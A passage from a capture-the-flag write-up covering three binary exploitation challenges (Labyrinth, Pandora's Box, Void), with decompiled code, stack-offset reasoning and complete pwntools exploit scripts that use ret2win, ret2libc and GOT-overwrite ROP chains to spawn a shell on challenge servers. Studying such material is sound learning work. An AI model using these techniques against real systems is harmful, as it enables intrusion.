wall:</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\&#34;</span><span class="s">Fly like a bird and be free!</span><span class="se">\&#34;\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Would you like to change the door you chose?</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;&gt;&gt; &#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">1uLL</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0xA0uLL</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fgets</span><span class="p">(</span><span class="n">v4</span><span class="p">,</span> <span class="mi">68</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">fprintf</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\n</span><span class="s">%s[-] YOU FAILED TO ESCAPE!</span><span class="se">\n\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\x1B</span><span class="s">[1;31m&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>There is a buffer overflow associate with this line of code <code>fgets(v4, 68, stdin);</code> because <code>v4</code> was declared <code>char v4[8];</code> but we are allowed to input up to 68 bytes and we need to input &lsquo;69&rsquo; at first. Our attack plan will be overwrite the return address with the address of function <code>escape_plan</code>. IDA also provides us stack offset of variable <code>v4</code> which is <code>[rbp-30h]</code>, so we can calculate the correct padding which is equal <code>0x30 + 8 = 0x38 = 56</code>. The stack frame layout will be</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">|_______________| </span></span><span class="line"><span class="cl">| | </span></span><span class="line"><span class="cl">| &#34;A&#34;*56 | </span></span><span class="line"><span class="cl">| | </span></span><span class="line"><span class="cl">|_______________| </span></span><span class="line"><span class="cl">| | </span></span><span class="line"><span class="cl">|ret instruction| # padding ret because of movaps instruction </span></span><span class="line"><span class="cl">|_______________| </span></span><span class="line"><span class="cl">| | </span></span><span class="line"><span class="cl">| escape_plan | </span></span><span class="line"><span class="cl">|_______________| </span></span><span class="line"><span class="cl">| . | </span></span></code></pre></div><p>We can use <code>ROPgadget</code> to find the address of instruction <code>ret</code></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-zsh" data-lang="zsh"><span class="line"><span class="cl">$ ROPgadget --binary labyrinth <span class="p">|</span> grep <span class="s2">&#34;ret&#34;</span> </span></span><span class="line"><span class="cl">0x0000000000401016 : ret </span></span></code></pre></div><p>We yield the final exploit</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="ch">#!/usr/bin/env python3</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">exe</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./labyrinth&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">binary</span> <span class="o">=</span> <span class="n">exe</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s2">&#34;167.71.143.44&#34;</span><span class="p">,</span><span class="mi">31869</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="c1"># p = process(&#39;./labyrinth&#39;)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt;&gt; &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;69&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;&gt;&gt; &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">ret</span> <span class="o">=</span> <span class="mh">0x0000000000401016</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="o">*</span><span class="mi">56</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span><span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">exe</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;escape_plan&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span></code></pre></div><p>Flag is: <strong>HTB{3sc4p3_fr0m_4b0v3}</strong></p> <h2 id="pandoras-box">Pandora&rsquo;s Box</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/drive/folders/1tkjLHsRXx8WdNrzWexbeDfcS3kFkCc-U?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> You stumbled upon one of Pandora’s mythical boxes. Would you be curious enough to open it and see what’s inside, or would you opt to give it to your team for analysis?</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Binary Exploitation/Pwnable</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>The challenge greeted us with a binary following a libc.so.6 and a ld-linux-x86-64.so.2.</p> <p>Decompile the binary using <a href="https://hex-rays.com/ida-pro/" target="_blank" rel="noopener">IDA Pro</a>, we easily found the vulnerability lied within the <code>box()</code> fucntion.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">size_t</span> <span class="nf">box</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">s</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-30h] BYREF </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v2</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-28h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v3</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-20h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v4</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-18h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">num</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-8h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">s</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v2</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v3</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v4</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">fwrite</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;This is one of Pandora&#39;s mythical boxes!</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;Will you open it or Return it to the Library for analysis?</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;1. Open.</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;2. Return.</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;&gt;&gt; &#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">1uLL</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mh">0x7EuLL</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">num</span> <span class="o">=</span> <span class="n">read_num</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">num</span> <span class="o">!=</span> <span class="mi">2</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">fprintf</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">,</span> <span class="s">&#34;%s</span><span class="se">\n</span><span class="s">WHAT HAVE YOU DONE?! WE ARE DOOMED!</span><span class="se">\n\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="s">&#34;</span><span class="se">\x1B</span><span class="s">[1;31m&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">exit</span><span class="p">(</span><span class="mi">1312</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">fwrite</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\n</span><span class="s">Insert location of the library: &#34;</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">,</span> <span class="mh">0x21uLL</span><span class="p">,</span> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fgets</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">256</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">fwrite</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">We will deliver the mythical box to the Library for analysis, thank you!</span><span class="se">\n\n</span><span class="s">&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">1uLL</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="mi">75uLL</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>A classic buffer overflow exploitation. Howerver, this time there was no win function to print out the flag so we had to get a shell using ret2libc technique. The binary has no Canary nor PIE enable so we didn&rsquo;t need to leak anything other than the libc address.</p> <p>Using gdb we knew that the offset from our input buffer to the return address of <code>box()</code> is 56 bytes long.</p> <p>Our 1st ROP chain would be to leak the address of the <code>puts()</code> function from the GOT table using the <code>puts()</code> function itself.</p> <p>The 2nd ROP chain was used to call the <code>system()</code> function from the libc with the argument string being &ldquo;/bin/sh&rdquo;. I didn&rsquo;t use <a href="https://github.com/david942j/one_gadget" target="_blank" rel="noopener">one_gadget</a> since none of the provided gadgets worked.</p> <p>The other gadgets such as <em>pop rdi ; ret</em> you can get them using <a href="https://github.com/JonathanSalwan/ROPgadget" target="_blank" rel="noopener">ROPgadget</a> or <a href="https://github.com/sashs/Ropper" target="_blank" rel="noopener">Ropper</a></p> <p>Here&rsquo;s the exploit script.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-py" data-lang="py"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">exe</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./pb&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s1">&#39;./libc.so.6&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;68.183.37.122&#39;</span><span class="p">,</span> <span class="mi">30673</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="c1">#io = exe.process()</span> </span></span><span class="line"><span class="cl"><span class="c1">#gdb.attach(io, api=True)</span> </span></span><span class="line"><span class="cl"><span class="c1"># Gadgets:</span> </span></span><span class="line"><span class="cl"><span class="n">pad</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;i&#39;</span><span class="o">*</span><span class="mi">56</span> </span></span><span class="line"><span class="cl"><span class="n">pop_rdi</span> <span class="o">=</span> <span class="mh">0x000000000040142b</span> </span></span><span class="line"><span class="cl"><span class="n">binsh</span> <span class="o">=</span> <span class="mh">0x1d8698</span> </span></span><span class="line"><span class="cl"><span class="n">ret</span> <span class="o">=</span> <span class="mh">0x00000000004013a5</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 1st chain leak libc</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&gt;&gt; &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;library: &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="n">pad</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">exe</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;puts&#39;</span><span class="p">])</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">exe</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s1">&#39;puts&#39;</span><span class="p">])</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">exe</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;main&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;thank you!</span><span class="se">\n\n</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">leak_puts</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">recvline</span><span class="p">(</span><span class="n">keepends</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="sa">b</span><span class="s1">&#39;</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"><span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">leak_puts</span> <span class="o">-</span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;puts&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># 2nd chain get shell</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;</span><span class="se">\n</span><span class="s1">&gt;&gt; &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;2&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="sa">b</span><span class="s1">&#39;library: &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]))</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="n">pad</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">pop_rdi</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">+</span> <span class="n">binsh</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span></code></pre></div><img src="pandora.png" alt="Never gonna give you up" width="1000"/> <p>Flag is: <strong>HTB{r3turn_2_P4nd0r4?!}</strong></p> <h2 id="void">Void</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://github.com/padolex/misc/blob/main/pwn_void.zip" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> The room goes dark and all you can see is a damaged terminal. Hack into it to restore the power and find your way out.</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Binary Exploitation/Pwnable</p> </li> <li> <p><strong>Difficulty:</strong> Medium</p> </li> </ul> <p>The program is simple, buffer overflow occurs in function <code>vuln</code>, here is the pseudocode of <code>vuln</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="n">ssize_t</span> <span class="nf">vuln</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-40h] BYREF </span></span></span><span class="line"><span class="cl"><span class="c1"></span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0xC8uLL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>I found a similar write-up for this challenge <a href="https://nandynarwhals.org/cyberpeace-2022-crysys/" target="_blank" rel="noopener">here</a>. The main idea is to ultilize ROP gadgets to spawn a shell, there is an interesting gadget allows us to modify memory by adding a 32 bit value to that memory, let call this <code>add_gadget</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ROPgadget --binary void <span class="p">|</span> grep <span class="s2">&#34;ebx&#34;</span> </span></span><span class="line"><span class="cl">0x0000000000401108 : add dword ptr <span class="o">[</span>rbp - 0x3d<span class="o">]</span>, ebx <span class="p">;</span> nop dword ptr <span class="o">[</span>rax + rax<span class="o">]</span> <span class="p">;</span> ret </span></span></code></pre></div><p>Our attack plan</p> <ul> <li>Stage 1 store string &ldquo;/bin/sh&rdquo; in <code>.bss</code> section.</li> <li>Stage 2 change <code>read@GOT</code> to <code>system@GOT</code> by adding an offset between <code>read@GOT</code> and <code>system@GOT</code>.</li> <li>Stage 3 call <code>read@plt</code> with <code>/bin/sh</code>.</li> </ul> <p>Our used gadgets in exploit script</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">rdi = 0x00000000004011bb : pop rdi ; ret </span></span><span class="line"><span class="cl">rsi_r15 = 0x00000000004011b9 : pop rsi ; pop r15 ; ret </span></span><span class="line"><span class="cl">add_gadget = 0x0000000000401108 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret </span></span><span class="line"><span class="cl">gadget = 0x00000000004011b2 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret </span></span></code></pre></div><p>Here is the exploit script</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s1">&#39;amd64&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s1">&#39;138.68.162.218&#39;</span><span class="p">,</span> <span class="mi">30569</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="c1"># p = process(&#39;./void&#39;)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">libc_elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./libc.so.6&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s2">&#34;./void&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">read_got</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">libc_system</span> <span class="o">=</span> <span class="n">libc_elf</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;system&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"><span class="n">libc_read</span> <span class="o">=</span> <span class="n">libc_elf</span><span class="o">.</span><span class="n">symbols</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">system_offset</span> <span class="o">=</span> <span class="n">libc_system</span> <span class="o">-</span> <span class="n">libc_read</span> </span></span><span class="line"><span class="cl"><span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">&#39;system offset in libc from read: </span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">system_offset</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"><span class="n">system_offset</span> <span class="o">=</span> <span class="n">system_offset</span> <span class="o">&amp;</span> <span class="mh">0xffffffffffffffff</span> </span></span><span class="line"><span class="cl"><span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">&#39;Twos complement of this offset: </span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">system_offset</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">binsh_addr</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">bss</span><span class="p">()</span> <span class="o">+</span> <span class="mh">0x10</span> </span></span><span class="line"><span class="cl"><span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s1">&#39;/bin/sh string Address: </span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">binsh_addr</span><span class="p">)))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">rsi_r15</span> <span class="o">=</span> <span class="mh">0x00000000004011b9</span> </span></span><span class="line"><span class="cl"><span class="n">gadget</span> <span class="o">=</span> <span class="mh">0x004011b2</span> </span></span><span class="line"><span class="cl"><span class="n">add_gadget</span> <span class="o">=</span> <span class="mh">0x0000000000401108</span> </span></span><span class="line"><span class="cl"><span class="n">rdi</span> <span class="o">=</span> <span class="mh">0x00000000004011bb</span> </span></span><span class="line"><span class="cl"><span class="n">ret</span> <span class="o">=</span> <span class="mh">0x0000000000401016</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># stage 1 store string &#34;/bin/sh&#34; in .bss section</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s1">&#39;A&#39;</span><span class="o">*</span><span class="mh">0x48</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rsi_r15</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">binsh_addr</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="c1"># Stage 2 change read@GOT to system@GOT</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">gadget</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">system_offset</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">got</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">]</span> <span class="o">+</span> <span class="mh">0x3d</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">*</span><span class="mi">4</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">add_gadget</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="c1"># call read(&#34;/bin/sh&#34;) = system(&#34;/bin/sh&#34;)</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">rdi</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">binsh_addr</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span> <span class="c1"># padding ret </span> </span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">elf</span><span class="o">.</span><span class="n">plt</span><span class="p">[</span><span class="s1">&#39;read&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="o">+</span><span class="sa">b</span><span class="s1">&#39;/bin/sh</span><span class="se">\x00</span><span class="s1">&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">p</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> </span></span></code></pre></div><p>Flag is: <strong>HTB{r3s0lv3_th3_d4rkn355}</strong></p> <h2 id="original-posts">Original Posts</h2> <ul> <li><a href="https://fazect.github.io/htb2023/" target="_blank" rel="noopener">From FazeCT</a></li> </ul>